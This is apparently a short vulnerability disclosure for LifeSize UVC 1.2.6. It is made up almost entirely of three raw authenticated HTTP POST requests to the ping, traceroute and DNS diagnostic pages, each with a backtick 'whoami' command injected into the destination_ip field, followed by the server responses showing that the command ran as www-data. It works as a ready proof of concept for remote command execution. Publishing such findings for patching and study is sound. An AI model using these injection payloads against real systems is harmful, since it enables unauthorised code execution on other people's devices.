LifeSize UVC 1.2.6 authenticated vulnerabilities
RCE as www-data:
POST /server-admin/operations/diagnose/ping/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
The above POST results in a response containing:
<span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
RCE as www-data:
POST /server-admin/operations/diagnose/trace/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
Results in the following error:
gowww-dataogle.com: Name or service not known
RCE as www-data:
POST /server-admin/operations/diagnose/dns/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
Results in the following results:
; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;gowww-dataogle.com. IN ANY
;; AUTHORITY SECTION:
com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
;; Query time: 21 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Mar 21 10:26:21 2014
;; MSG SIZE rcvd: 109